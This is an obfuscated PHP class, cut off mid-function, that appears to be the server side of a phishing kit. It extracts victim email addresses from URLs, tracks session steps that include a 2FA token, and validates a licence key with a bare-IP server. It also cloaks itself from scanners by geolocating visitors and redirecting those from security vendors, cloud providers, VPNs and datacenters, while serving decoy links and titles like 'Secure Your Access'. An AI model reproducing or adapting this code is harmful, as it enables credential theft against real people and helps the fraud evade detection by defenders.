$a3e00 = 1; goto Bc4f4; f19c4: goto ea91d; goto Bd783; e627e: B0690: goto A33bd; af21f: e750a: goto d6327; bb8b0: $a3e00 = 0; goto af21f; F3c5f: $Be897 = curl_init($a70df); goto dbc34; Acd0b: if (isset($_SESSION["\141\x75\164\x68"])) { goto bfdf2; } goto a57c9; E0487: ed96b: goto ae3c8; E770f: f1418: goto B70ed; Dac1b: unset($_SESSION["\x63\154\157\165\144\146\154\x61\162\x65"]); goto ab669; Cb321: $this->checkUserSecurity($F9771); goto Efbbb; a4ebe: if ($Fcdbd["\x6c\151\166\145"] && !$Fcdbd["\x65\x78\160\151\162\x65\x64"]) { goto C7cd3; } goto Dbbe3; e89de: $a3e00 = 3; goto fa307; F2efb: if (!isset($_SESSION["\x63\141\160\x74\x63\150\x61"])) { goto c6f29; } goto c147f; F875b: if (!isset($_SESSION["\x69\156\146\x6f\137\164\x6f\x6b\145\x6e\137\x32\x66\x61"])) { goto Bbe1c; } goto d2540; C3cad: $a70df = "\150\x74\x74\160\x3a\x2f\x2f\61\60\x31\56\71\71\56\x39\62\56\x31\x32\64\57\x61\x70\151\x2f\153\x65\171"; goto a843d; df7cb: $Fcdbd = json_decode($Fcdbd, true); goto Ad34d; cfa8e: C7cd3: goto db30a; Ad34d: if (isset($Fcdbd["\x6c\x69\166\145"])) { goto fd5ab; } goto F5fbd; a3fea: if (isset($_SESSION["\141\x75\164\x68"])) { goto ba98b; } goto e89de; c2a30: if (!isset($_SESSION["\x61\x75\x74\x68"])) { goto B0690; } goto F2efb; Ec513: Db8be: goto F875b; ab669: f57a7: goto b9648; Ac1b4: Bbe1c: goto e627e; b9648: if (!isset($_SESSION["\x65\155\x61\151\x6c"])) { goto f1418; } goto Bdf29; Bd783: fd5ab: goto a4ebe; da6e8: $this->redirect("\x53\x65\x72\x76\145\162\x45\162\162\157\x72"); goto E0487; Bdf29: unset($_SESSION["\x65\x6d\141\x69\x6c"]); goto E770f; Dca9a: $F9771 = $_SESSION["\x75\x73\x65\x72\x5f\x64\141\164\x61"]; goto Cb321; a437e: } public function check_captcha_valid($Fcdbd) { goto f5ea7; F4f7e: $f39f0 = $Fcdbd ?? ''; goto d85f4; f2a75: exit; goto F997f; Ff911: goto f5806; goto d81b5; f5ea7: $F5eb9 = $this->A59a0["\x63\x61\x70\x74\x63\150\x61"]["\x73\151\164\145\x6b\145\x79"]; goto F4f7e; eb8a6: header("\114\157\x63\x61\164\x69\x6f\x6e\72\40\166\145\x72\151\146\x79"); goto e1816; C2630: $_SESSION["\x63\141\160\x74\x63\150\141"] = true; goto eb8a6; Bbef2: $A571a = $c5459["\x61\143\x74\151\157\156"] ?? ''; goto D0986; Ab0fc: $_SESSION["\x63\141\x70\x74\143\x68\141"] = false; goto cc206; Fd456: $d0172 = $c5459["\163\x63\157\162\x65"] ?? 0; goto Bbef2; D0986: if ($d0172 >= $this->A59a0["\143\141\160\x74\143\x68\x61"]["\x73\x63\x6f\162\x65"] && $A571a === "\x63\x61\x70\164\143\x68\141") { goto Dc281; } goto Ab0fc; e1816: exit; goto D7b3e; cc206: $this->insertDataVisitor(false); goto eeec6; D7b3e: f5806: goto f2a75; d85f4: $Fcdbd = file_get_contents("\x68\164\164\160\x73\x3a\57\57\167\x77\x77\56\147\157\x6f\x67\x6c\x65\x2e\143\157\155\57\x72\x65\143\x61\160\x74\x63\x68\141\57\x61\x70\151\x2f\x73\151\x74\x65\166\x65\x72\151\146\171\77\163\x65\143\x72\145\x74\75" . urlencode($F5eb9) . "\x26\x72\x65\x73\160\x6f\156\x73\x65\75" . urlencode($f39f0)); goto b1a0c; eeec6: $this->redirect("\106\x61\151\x6c\103\141\160\x74\143\150\x61"); goto Ff911; b1a0c: $c5459 = json_decode($Fcdbd, true); goto Fd456; d81b5: Dc281: goto C2630; F997f: } public function checkKey() { goto b1bf7; a8b86: ae882: goto f27e1; ccd15: die; goto a8b86; B7700: header("\x4c\157\143\141\x74\151\x6f\156\x3a\40" . $this->A59a0["\146\x6f\154\144\x65\x72"]); goto ccd15; b1bf7: if (!(empty($this->A59a0["\x6b\145\171"]) || empty($this->A59a0["\160\141\163\x73\167\157\162\x64"]))) { goto ae882; } goto B7700; f27e1: } public function check_cloudflare_valid($Fcdbd) { goto ffe86; Ccc3e: goto Ddf3d; goto Ddd0e; dcf3a: $c5459 = json_decode($E2475, true); goto f03c7; C33b0: $Be897 = curl_init(); goto B2833; f03c7: if ($c5459["\163\x75\143\x63\x65\x73\163"]) { goto E655e; } goto bcd45; F99b0: Ddf3d: goto D8f0d; a72fc: curl_setopt($Be897, CURLOPT_POSTFIELDS, http_build_query($F9771)); goto C02f9; Ddd0e: E655e: goto Dd8d8; Cf1a1: $E2475 = curl_exec($Be897); goto ea587; B2833: curl_setopt($Be897, CURLOPT_URL, "\150\x74\x74\160\163\72\x2f\x2f\143\x68\141\154\154\145\156\147\x65\163\56\143\154\x6f\x75\x64\146\154\141\162\145\56\x63\x6f\155\x2f\164\165\x72\156\x73\164\x69\x6c\145\57\166\x30\x2f\163\x69\x74\x65\166\x65\162\151\146\x79"); goto Ca960; c2750: $F9771 = ["\x73\145\143\162\145\x74" => $Cb1e4, "\x72\x65\163\x70\x6f\156\x73\145" => $Fcdbd]; goto C33b0; E5271: $this->redirect("\105\x72\x72\157\162\103\x61\160\x74\143\150\x61"); goto ffcf4; bd89d: curl_close($Be897); goto Af415; ffcf4: E88a5: goto bd89d; bcd45: $this->insertDataVisitor(false); goto e7d7b; D8f0d: goto E88a5; goto Fb33d; ea587: if (curl_errno($Be897)) { goto d0ee5; } goto dcf3a; Ca960: curl_setopt($Be897, CURLOPT_POST, true); goto a72fc; C02f9: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, true); goto Cf1a1; e7d7b: $this->redirect("\x46\x61\151\x6c\x43\141\x70\x74\x63\x68\x61"); goto Ccc3e; Dd8d8: $_SESSION["\x63\154\x6f\165\144\x66\x6c\141\162\x65"] = true; goto F99b0; ffe86: $Cb1e4 = $this->A59a0["\143\154\157\165\144\146\x6c\141\x72\x65"]["\x63\154\x6f\165\x64\163\x69\164\145\153\145\x79"]; goto c2750; Fb33d: d0ee5: goto E5271; Af415: } public function generateRandomString($e6e65 = 10) { return substr(str_shuffle(str_repeat($ed791 = "\141\142\143\144\145\146\147\150\x69\152\153\x6c\x6f\155\x6e\157\x70\161\162\163\x74\165\x76\x77\170\x79\172\101\102\103\x44\105\106\x47\x48\x49\112\x4b\x4c\x4d\x4e\117\120\121\122\123\124\125\126\127\x58\x59\x5a\60\x31\62\x33\64\65\66\x37\70\x39", ceil($e6e65 / strlen($ed791)))), 1, $e6e65); } public function isValidEmail($E939e) { return filter_var($E939e, FILTER_VALIDATE_EMAIL) !== false; } public function decodeBase64Email($E939e) { goto Ec6b1; e7651: $d4894 = base64_decode($E939e, true); goto Ba0e5; Ff20c: return $d4894; goto D2a03; D2a03: cd7f1: goto e305c; Ba0e5: if (!($d4894 !== false && $this->isValidEmail($d4894))) { goto cd7f1; } goto Ff20c; Ec6b1: if (!$this->isValidEmail($E939e)) { goto Bef72; } goto Ca615; e305c: return ''; goto Dc62f; Cc40b: Bef72: goto e7651; Ca615: return $E939e; goto Cc40b; Dc62f: } public function getTitle() { goto f56f1; c6dcd: $E6ee8 = $this->A59a0["\164\151\x74\x6c\x65"][$Ee26d]; goto f2d44; f56f1: $Ee26d = array_rand($this->A59a0["\164\151\x74\x6c\145"]); goto c6dcd; f2d44: return $E6ee8; goto C4064; C4064: } public function getSingleValidEmailFromQueryParameters() { goto afa52; afa52: $c006b = ["\x65\x6d\141\151\154", "\145", "\x74", "\164\141\162\147\145\164", "\x61"]; goto a2180; a2180: $E7b35 = array_intersect_key($_GET, array_flip($c006b)); goto E011e; E011e: if (!(count($E7b35) === 1)) { goto Ea7ac; } goto aad7d; Be199: $F4bfb = $E7b35[$e8220]; goto fcf3a; e8e9e: return ''; goto f0786; F0530: Ea7ac: goto e8e9e; aad7d: $e8220 = key($E7b35); goto Be199; fcf3a: return $this->decodeBase64Email($F4bfb); goto F0530; f0786: } public function getRandomLink() { goto F69b4; f2f4a: return $C8866; goto ce156; d92b2: $C8866 = base64_decode($E6fbf[$ca9ae]); goto f2f4a; b71e0: $ca9ae = rand(0, 11); goto d92b2; F69b4: $E6fbf = array("\x61\110\122\60\x63\110\x4d\66\x4c\x79\71\157\143\x6d\x56\x6d\x4c\155\x78\160\x4c\172\71\157\144\x48\122\167\x63\x7a\x6f\166\x4c\62\x56\x75\114\156\144\160\141\62\x6c\167\x5a\x57\x52\160\131\123\65\x76\x63\155\143\x76\144\62\x6c\162\141\x53\71\x4e\x61\127\x4e\171\x62\x33\x4e\x76\x5a\156\122\146\x4d\172\x59\61", "\x61\x48\x52\60\x63\110\x4d\x36\x4c\x79\71\x6f\143\155\126\155\114\155\x78\160\x4c\172\x39\x6f\x64\110\x52\x77\143\172\x6f\x76\x4c\62\126\x75\114\156\x64\x70\x61\x32\154\167\132\127\122\x70\131\123\65\166\x63\155\143\166\144\x32\x6c\162\x61\123\x39\x4d\x61\x58\116\x30\130\x32\x39\x6d\130\60\x31\x70\x59\x33\112\x76\x63\62\x39\x6d\x64\106\x38\x7a\116\x6a\126\146\121\x58\x42\167\142\x47\154\152\x59\x58\122\160\x62\x32\65\172", "\x61\110\122\x30\143\110\115\66\114\x79\x39\157\x63\x6d\x56\155\x4c\x6d\x78\160\114\x7a\71\x6f\x64\x48\122\x77\143\x7a\157\166\114\x32\126\x75\114\156\144\x70\x61\x32\154\x77\x5a\x57\122\160\x59\123\65\166\143\155\x63\x76\144\62\154\162\x61\123\71\104\131\130\122\x6c\132\62\x39\171\x65\124\160\120\x5a\155\132\160\131\62\x56\x66\x4d\172\x59\x31", "\x61\110\122\x30\x63\110\115\66\x4c\171\x39\157\143\x6d\126\155\x4c\155\x78\160\114\x7a\x39\157\144\x48\x52\167\143\x7a\157\166\114\62\x6c\153\x4c\156\x64\x70\141\62\154\x77\132\x57\122\x70\131\x53\65\x76\143\x6d\143\x76\144\x32\154\x72\141\123\71\103\132\x58\112\x72\x59\x58\115\x36\124\x47\71\156\142\61\71\x4e\x61\127\x4e\x79\x62\63\116\x76\x5a\156\x52\146\x54\x32\132\155\141\127\116\154\130\172\x4d\62\116\126\70\x6f\x4d\152\101\x78\x4d\171\60\x79\x4d\x44\x45\x35\x4b\x53\x35\x7a\x64\x6d\x63\75", "\141\110\122\x30\x63\110\115\66\x4c\171\x39\157\143\155\126\155\x4c\155\170\160\114\x7a\71\157\x64\x48\x52\x77\143\x7a\157\166\114\x32\126\x75\114\156\144\160\x61\62\154\167\132\x57\122\160\x59\123\65\x76\143\x6d\x63\x76\x64\x32\154\162\141\123\71\116\x61\127\116\171\142\63\x4e\166\132\156\122\x66\124\x32\x5a\155\x61\127\116\x6c\x58\60\x31\160\x65\101\x3d\x3d", "\141\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\71\x6f\x63\x6d\126\x6d\114\155\x78\160\x4c\x7a\x39\x6f\x64\x48\x52\167\143\x7a\157\x76\x4c\x32\126\x75\x4c\156\144\160\x61\62\x6c\x77\132\x57\x52\160\x59\123\x35\166\x63\155\x63\166\144\62\x6c\x72\x61\123\71\x4e\141\127\116\x79\142\63\116\166\x5a\156\122\x66\x52\x58\150\x6a\x61\x47\x46\165\132\x32\126\146\125\62\126\171\144\155\126\x79", "\x61\110\122\60\x63\x48\115\66\x4c\171\71\x6f\143\x6d\126\155\x4c\x6d\170\x70\x4c\172\x39\x6f\144\x48\x52\167\143\172\x6f\166\114\x32\x56\x75\x4c\156\144\x70\141\62\154\x77\132\127\x52\160\x59\123\65\166\143\x6d\143\166\144\x32\154\x72\x61\x53\71\x46\142\x57\106\x70\142\x46\71\x6a\x62\x47\154\154\x62\156\121\x3d", "\141\110\x52\x30\x63\110\x4d\66\114\171\71\x6f\143\155\126\x6d\x4c\x6d\170\160\114\172\x39\x6f\x64\x48\122\x77\x63\172\x6f\x76\114\62\126\x75\x4c\x6e\144\x70\x61\x32\x6c\x77\132\x57\x52\160\131\x53\x35\x76\x63\155\x63\166\x64\62\154\x72\141\123\71\106\x62\x57\106\x70\x62\101\75\75", "\141\x48\x52\60\x63\x48\115\66\x4c\171\71\157\143\155\126\155\114\155\170\x70\114\172\x39\157\x64\x48\122\x77\143\x7a\157\x76\x4c\x32\126\x75\x4c\156\144\160\x61\x32\154\x77\x5a\x57\x52\160\131\123\65\x76\x63\155\143\166\144\x32\154\162\141\123\71\104\142\107\x6c\x6c\x62\x6e\122\x66\131\x57\116\x6a\132\130\116\x7a\130\62\x78\160\131\62\126\165\143\x32\x55\x3d", "\141\110\x52\60\143\110\x4d\x36\x4c\x79\x39\x6f\x63\155\x56\155\114\155\x78\x70\114\172\71\157\x64\x48\x52\x77\x63\x7a\157\x76\x4c\x32\x56\165\x4c\x6e\144\x70\x61\x32\154\167\132\x57\x52\x70\131\x53\65\166\143\x6d\x63\166\144\x32\154\x72\x61\x53\x39\x58\x61\x57\65\153\x62\x33\144\172\130\x31\116\154\143\x6e\x5a\154\143\x6c\70\171\115\x44\105\62", "\141\110\x52\x30\x63\x48\x4d\66\x4c\171\71\x6f\x63\x6d\126\x6d\x4c\155\170\x70\x4c\172\71\157\144\x48\122\x77\143\x7a\157\x76\x4c\62\x56\x75\x4c\156\x64\160\x61\62\x6c\167\x5a\127\122\x70\131\123\x35\166\x63\155\x63\x76\144\62\154\162\x61\123\71\x58\x61\x57\x35\153\142\63\x64\172\130\x31\116\154\143\156\132\154\x63\154\70\x79\x4d\104\x45\x35", "\141\110\122\60\x63\x48\115\x36\114\171\x39\157\143\x6d\126\x6d\114\155\170\160\x4c\172\x39\157\144\x48\122\x77\143\x7a\x6f\166\114\x32\126\x75\x4c\156\x64\x70\141\x32\x6c\x77\132\x57\x52\x70\x59\123\65\166\x63\x6d\143\166\x64\x32\x6c\x72\x61\x53\x39\112\x62\x6e\122\x6c\x63\155\65\x6c\144\106\71\106\x65\x48\x42\x73\x62\63\112\154\143\154\70\170\x4d\121\x3d\x3d"); goto b71e0; ce156: } public function getRandomTitle() { goto Ae591; E177c: return $f8f15[$B4814]; goto d8b90; Ae591: $f8f15 = ["\x49\156\151\x74\x69\141\154\151\172\x69\x6e\147\56\56", "\x50\x72\157\143\x65\163\163\151\156\147\56\x2e", "\x43\157\155\160\x6c\x65\164\151\156\x67\56\56", "\x53\145\143\x75\x72\x65\40\x59\x6f\165\x72\x20\x41\x63\x63\x65\163\x73"]; goto f8330; f8330: $B4814 = array_rand($f8f15); goto E177c; d8b90: } public function removeUrlParameters($a70df) { goto D09ab; A7f0f: $c6373 .= isset($c39bc["\160\141\164\x68"]) ? $c39bc["\x70\x61\x74\x68"] : ''; goto f3e71; b952a: $c6373 = isset($c39bc["\x73\x63\150\145\155\145"]) ? $c39bc["\163\x63\150\145\155\x65"] . "\x3a\x2f\57" : ''; goto a1fc6; a1fc6: $c6373 .= isset($c39bc["\150\x6f\x73\164"]) ? $c39bc["\150\157\163\164"] : ''; goto A7f0f; f3e71: return $c6373; goto e920f; D09ab: $c39bc = parse_url($a70df); goto b952a; e920f: } public function removeLastTwoDirectories($a70df) { goto d9807; A1ac5: ee452: goto e2338; Caffc: $e56ea = (isset($c39bc["\163\x63\x68\145\155\145"]) ? $c39bc["\163\143\150\x65\x6d\x65"] . "\x3a\57\57" : '') . (isset($c39bc["\x68\x6f\x73\164"]) ? $c39bc["\150\157\163\164"] : '') . $ec1c1; goto b99c1; e2338: return rtrim($e56ea, "\x2f"); goto D5914; e6b36: $ec1c1 = "\x2f" . implode("\57", $c8ef1); goto Caffc; b99c1: if (!isset($c39bc["\x71\165\x65\x72\x79"])) { goto ee452; } goto E97d4; d9807: $c39bc = parse_url($a70df); goto bfa52; E97d4: $e56ea .= "\77" . $c39bc["\161\165\145\x72\171"]; goto A1ac5; bfa52: $c56a5 = explode("\57", trim($c39bc["\x70\x61\x74\150"], "\57")); goto e36f7; e36f7: $c8ef1 = array_slice($c56a5, 0, -2); goto e6b36; D5914: } public function getLastSegmentFromUrl() { goto a119b; e014d: Ea627: goto fe304; bf27a: if (!(count($E0385) > 1)) { goto Ea627; } goto Da6fb; A3ac1: $E0385 = explode("\x2f", $Dac15); goto bf27a; Da6fb: return $E0385[count($E0385) - 2]; goto e014d; Df312: $Dac15 = trim($Dac15, "\x2f"); goto A3ac1; abd75: $Dac15 = parse_url($a70df, PHP_URL_PATH); goto Df312; fe304: return null; goto C56ed; a119b: $a70df = $_SERVER["\122\105\x51\x55\105\x53\x54\137\x55\x52\x49"]; goto abd75; C56ed: } public function validateLink() { goto a29ad; Ad5fc: Ca1e0: goto B43a1; a63cc: $this->redirect("\x4c\151\x6e\153\x49\156\166\x61\x6c\x69\144"); goto Ad5fc; F9887: if (!($this->getLastSegmentFromUrl() != $_SESSION["\154\151\x6e\x6b"])) { goto Ca1e0; } goto a63cc; a29ad: if (isset($_SESSION["\x6c\151\x6e\153"])) { goto F197d; } goto b2bac; b2bac: $this->redirect("\114\x69\x6e\153\116\157\164\106\157\165\156\144"); goto Ce10d; Ce10d: F197d: goto F9887; B43a1: } public function getFullUrl() { goto Ae80f; a8da9: $A85f9 = $_SERVER["\122\x45\x51\125\x45\x53\x54\x5f\125\122\111"]; goto B8c38; B8c38: return $C279f . $B0c50 . $A85f9; goto ccbdc; a26a6: $B0c50 = $_SERVER["\110\x54\124\x50\137\110\117\x53\124"]; goto a8da9; Ae80f: $C279f = !empty($_SERVER["\x48\x54\124\x50\123"]) && $_SERVER["\110\124\124\120\123"] !== "\157\146\x66" || $_SERVER["\123\105\122\x56\x45\122\x5f\120\117\x52\124"] == 443 ? "\x68\164\x74\160\163\72\x2f\x2f" : "\x68\x74\x74\x70\72\57\x2f"; goto a26a6; ccbdc: } public function imageToBase64($D1f53) { goto e07b4; e07b4: $C61be = file_get_contents($D1f53); goto e3794; e3794: $c75f9 = base64_encode($C61be); goto fc276; Fcbef: return "\144\141\x74\141\x3a{$B087f}\73\x62\141\x73\145\x36\x34\54{$c75f9}"; goto D0634; fc276: $B087f = $this->getMimeType($D1f53); goto Fcbef; D0634: } public function getBackground() { goto c76af; C5995: B27c2: goto Adf4e; E9f4c: if (file_exists($D1f53)) { goto F6d79; } goto f83d1; Aaac8: if (file_exists($D1f53)) { goto b2685; } goto a7e3d; e3f29: C5654: goto E1847; Cb861: D09a8: goto Ffffa; d73b2: goto B27c2; goto e3f29; b88c4: $D1f53 = "\x70\141\147\145\x2f\x69\x6d\141\x67\145\x73\57" . $this->A59a0["\142\141\143\153\147\162\157\165\x6e\x64"] . "\56\x70\x6e\147"; goto E9f4c; F1139: if (file_exists($D1f53)) { goto D09a8; } goto E24d5; E24d5: die("\151\155\141\x67\145\40\x6e\x6f\164\x20\146\x6f\165\156\144\56"); goto Cb861; ab954: F6d79: goto F9b16; c76af: if ($this->A59a0["\x62\141\143\153\x67\x72\157\x75\156\144"] == "\x63\165\x73\164\x6f\155") { goto C5654; } goto Ac1a1; a7b99: if (file_exists($D1f53)) { goto Cff7b; } goto b88c4; f83d1: die("\x69\x6d\x61\147\x65\x20\156\x6f\x74\x20\x66\x6f\165\156\x64\56"); goto ab954; Adf4e: $Af573 = $this->imageToBase64($D1f53); goto c7b5c; Ac1a1: $D1f53 = "\151\155\x61\147\145\163\x2f" . $this->A59a0["\x62\141\x63\x6b\x67\162\x6f\x75\156\x64"] . "\x2e\x70\x6e\147"; goto a7b99; E1847: $D1f53 = "\151\x6d\x61\x67\x65\163\x2f" . $this->A59a0["\143\165\163\x74\x6f\x6d\x5f\x62\141\x63\x6b\x67\162\x6f\x75\x6e\144"]; goto Aaac8; c7b5c: return "\15\xa\40\x20\40\x20\x20\x20\40\x20\142\157\x64\171\x3a\x3a\142\145\146\157\x72\145\40\173\15\xa\40\40\x20\x20\40\40\40\x20\40\40\40\x20\x63\157\156\164\145\156\x74\x3a\x20\x22\x22\73\40\57\52\40\x45\x6d\x70\x74\171\x20\143\x6f\x6e\x74\x65\156\x74\x20\164\157\x20\141\x6c\x6c\x6f\x77\x20\164\150\x65\40\x70\x73\x65\x75\x64\x6f\x2d\145\154\145\x6d\x65\156\164\40\164\x6f\x20\x72\x65\156\x64\145\162\40\52\57\15\12\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x70\157\x73\x69\x74\151\157\156\x3a\40\x61\x62\163\x6f\154\x75\x74\x65\73\40\x2f\52\x20\101\142\x73\157\x6c\x75\x74\145\x20\160\157\163\x69\164\x69\x6f\x6e\151\156\147\40\x2a\57\xd\12\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x74\x6f\160\72\x20\x30\73\xd\xa\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\154\145\146\x74\72\x20\60\x3b\15\xa\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x72\x69\147\150\x74\x3a\x20\60\x3b\xd\xa\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\142\x6f\x74\x74\157\155\x3a\x20\60\x3b\15\12\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x7a\55\151\156\144\145\170\72\x20\55\61\x3b\x20\x2f\x2a\x20\x45\x6e\163\165\162\145\x20\x69\x74\x20\x73\164\x61\x79\163\40\142\x65\150\x69\156\144\40\x6f\x74\x68\x65\x72\40\x63\157\x6e\x74\x65\156\x74\x20\52\x2f\15\xa\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\142\x61\x63\x6b\x67\162\x6f\165\x6e\144\x2d\x69\x6d\141\147\x65\x3a\x20\x75\162\154\x28\42" . $Af573 . "\42\x29\73\xd\xa\x20\40\40\x20\x20\x20\40\40\40\40\x20\40\142\141\143\x6b\147\x72\x6f\165\156\x64\55\163\151\x7a\145\x3a\40\x63\157\x76\x65\x72\73\40\x2f\x2a\40\x53\143\x61\x6c\x65\x20\x69\155\141\147\145\40\x74\x6f\40\x63\157\x76\x65\x72\40\x74\150\x65\x20\145\x6e\164\151\x72\145\x20\x61\162\x65\x61\40\x2a\57\15\12\40\x20\40\x20\x20\40\40\x20\40\40\40\40\x62\141\143\x6b\147\162\x6f\x75\x6e\144\x2d\160\x6f\x73\x69\164\x69\x6f\x6e\72\x20\x63\145\156\x74\x65\162\x3b\x20\x2f\52\40\x43\x65\x6e\164\x65\162\x20\164\150\145\x20\x62\141\143\153\x67\x72\157\x75\x6e\x64\x20\151\155\x61\147\x65\40\52\57\15\12\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\142\141\143\x6b\147\x72\157\165\156\144\55\162\x65\x70\145\141\164\x3a\40\156\x6f\55\162\x65\x70\145\141\164\x3b\40\x2f\52\40\x50\162\x65\x76\x65\156\x74\40\x72\145\x70\x65\x61\x74\x69\156\147\40\164\x68\145\x20\151\155\x61\x67\x65\x20\52\57\15\xa\40\x20\x20\40\x20\x20\40\40\175\40\x20\40\15\12\x20\x20\x20\40\40\x20\40\40"; goto f40d9; Ffffa: b2685: goto C5995; F9b16: Cff7b: goto d73b2; a7e3d: $D1f53 = "\x70\141\x67\x65\x2f\151\155\141\x67\x65\x73\57" . $this->A59a0["\x63\x75\x73\164\x6f\155\x5f\142\141\x63\153\x67\162\x6f\x75\156\144"]; goto F1139; f40d9: } public function getClientIp() { goto A7993; d2a9a: return "\125\x4e\113\x4e\117\x57\116"; goto e8e18; Ed162: foreach ($fba45 as $Dc982) { goto feb4b; D8859: if (!($A6d4e === "\72\x3a\61" || filter_var($A6d4e, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE))) { goto a0b0c; } goto a3bd7; Cfb99: fe589: goto Dc1af; fb291: $A6d4e = trim(explode("\x2c", $_SERVER[$Dc982])[0]); goto D8859; feb4b: if (!array_key_exists($Dc982, $_SERVER)) { goto C12a4; } goto fb291; a3bd7: return $A6d4e; goto f7b5f; f7b5f: a0b0c: goto f736c; f736c: C12a4: goto Cfb99; Dc1af: } goto F5cd5; A7993: $fba45 = ["\x48\x54\x54\120\137\x58\x5f\106\x4f\122\x57\x41\x52\x44\x45\104\x5f\x46\117\x52", "\110\x54\124\120\x5f\103\114\111\x45\116\124\x5f\111\120", "\110\124\x54\120\137\x58\x5f\x43\114\x55\123\x54\105\x52\x5f\x43\114\111\105\116\124\x5f\111\x50", "\110\124\124\x50\x5f\106\x4f\x52\x57\x41\x52\104\x45\104\x5f\106\x4f\x52", "\110\x54\x54\120\137\x46\x4f\122\127\101\x52\104\105\104", "\122\x45\115\117\124\105\x5f\101\104\x44\x52"]; goto Ed162; F5cd5: d04b1: goto d2a9a; e8e18: } public function getUserAgent() { goto B51c4; B51c4: if (isset($_SERVER["\110\x54\124\x50\x5f\x55\x53\x45\122\137\x41\x47\x45\116\124"])) { goto b1668; } goto D4f68; cf423: return $E69bf; goto A903c; fe189: $E69bf = htmlspecialchars(strip_tags($_SERVER["\x48\124\124\x50\x5f\125\x53\x45\x52\x5f\x41\x47\x45\116\x54"]), ENT_QUOTES, "\125\x54\x46\55\70"); goto cf423; D4f68: return "\x55\116\113\x4e\117\127\116"; goto ef9bb; A903c: a1c8c: goto C862a; a1cfa: b1668: goto fe189; ef9bb: goto a1c8c; goto a1cfa; C862a: } public function getClientLocation($A6d4e) { goto a6a47; Abdb7: $D9bce = curl_exec($Be897); goto B2c58; Ca1ef: $D9bce = json_decode($D9bce, true); goto D2f19; Cd2aa: curl_setopt($Be897, CURLOPT_URL, "\x68\164\164\160\163\x3a\57\x2f\x61\160\151\x2e\151\156\143\157\154\x75\155\x69\164\x61\x73\56\143\157\x6d\x2f\x3f\161\x3d" . $A6d4e); goto F6ac2; a6a47: $Be897 = curl_init(); goto Cd2aa; D50ff: c7e26: goto Dee13; F6ac2: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, 1); goto c1645; c1645: curl_setopt($Be897, CURLOPT_CUSTOMREQUEST, "\107\105\x54"); goto Abdb7; D2f19: return $D9bce; goto D50ff; B2c58: if (!($D9bce != '')) { goto c7e26; } goto Ca1ef; Dee13: } function isBlockedISP($D9bce) { goto Cceaa; Cceaa: $D25c8 = array("\x6d\x69\143\x72\x6f\x73\x6f\x66\x74", "\x6c\145\141\x73\x65\x77\145\x62", "\x6d\62\64\67", "\141\x6d\141\172\157\x6e", "\157\166\x68", "\143\x6f\147\x65\x6e\164", "\141\x6c\x69\x62\141\x62\141", "\x64\x69\x67\x69\x74\141\154\157\x63\x65\141\x6e", "\143\150\x6f\x6f\160\141", "\x6c\x69\x6e\x6f\x64\x65", "\x67\x6f\157\147\154\145", "\x6f\162\141\x63\154\x65", "\x6c\x61\171\x65\162\x68\157\x73\164", "\167\x6f\162\x6c\x64\163\164\x72\145\x61\155", "\156\x65\x78\164\147\x6c\x6f\x62\x61\154", "\151\x74\x70\162\157\170\x69\155\x75\163", "\x68\x6f\163\164\x72\157\x79\141\154\145", "\x63\145\x6e\x74\165\162\x79\x6c\x69\x6e\x6b", "\141\x76\x61\163\164", "\142\151\x74\144\145\146\145\156\x64\x65\x72", "\x77\145\142\156\170", "\155\x79\x6c\x6f\143"); goto Dcae4; Dcae4: $A1c5f = strtolower($D9bce); goto C5498; F22a6: c5c44: goto bce57; C5498: foreach ($D25c8 as $e0bce) { goto Bdc8a; c6085: return true; goto Fa02c; Bdc8a: if (!(stripos($A1c5f, $e0bce) !== false)) { goto f2b35; } goto c6085; Fa02c: f2b35: goto D079a; D079a: F20a7: goto C6bb3; C6bb3: } goto F22a6; bce57: return false; goto bae89; bae89: } public function checkUserSecurity($D9bce) { goto D7514; a4288: if (!($this->A59a0["\x62\x6f\164"]["\x76\160\x6e"] == 1 && $D9bce["\151\156\146\157"]["\x69\x73\137\x76\160\156"])) { goto e51ad; } goto Bffff; E7677: if ($D9bce["\151\156\146\157"]["\151\163\137\144\141\164\x61\143\145\x6e\164\145\162"] != false && $this->A59a0["\142\157\164"]["\144\x61\164\141\143\145\156\x74\x65\x72"] == 2) { goto F60f4; } goto a42e7; A0d99: $this->redirect("\104\165\x6d\x6d\x79\x42\x6f\164"); goto D708c; ed37d: d57c9: goto B25d4; B7f4e: $this->redirect("\104\x75\155\155\x79\102\157\x74"); goto a9142; ba565: $this->redirect("\x44\x75\x6d\x6d\x79\x42\157\x74"); goto cbed3; B58bd: if (!($this->A59a0["\x62\157\164"]["\x70\162\x6f\170\171"] == 1 && $D9bce["\x69\x6e\146\x6f"]["\151\163\x5f\160\x72\x6f\x78\x79"])) { goto ceadc; } goto Aaf49; a42e7: if (!($D9bce["\x69\156\x66\157"]["\151\163\x5f\x64\x61\x74\x61\143\x65\x6e\x74\145\x72"] != false && $this->A59a0["\x62\x6f\x74"]["\x64\x61\164\x61\143\x65\156\164\x65\162"] == 1 && $D9bce["\151\156\x66\x6f"]["\151\163\137\142\x6c\x6f\x63\153\145\144\x5f\144\141\164\x61\143\145\x6e\164\x65\x72"] == true)) { goto F1a61; } goto ba565; e6e43: F60f4: goto B7f4e; Edb25: $this->redirect("\104\x75\x6d\155\171\x42\x6f\164"); goto ed37d; cbed3: F1a61: goto D1608; A190f: if (!($this->A59a0["\x62\x6f\164"]["\x64\x61\164\141\x63\145\156\x74\145\x72"] != 0)) { goto A0bc7; } goto E7677; C20b6: e51ad: goto B58bd; Bffff: $this->redirect("\x44\165\x6d\155\x79\102\157\164"); goto C20b6; e0dc8: ceadc: goto Cca76; Cca76: if (!($this->A59a0["\x62\x6f\x74"]["\x61\x62\x75\163\145\162"] == 1 && $D9bce["\x69\156\146\x6f"]["\151\163\x5f\141\142\x75\163\145\x72"])) { goto d57c9; } goto Edb25; D1608: goto B23ac; goto e6e43; a9142: B23ac: goto e60a3; D7514: if 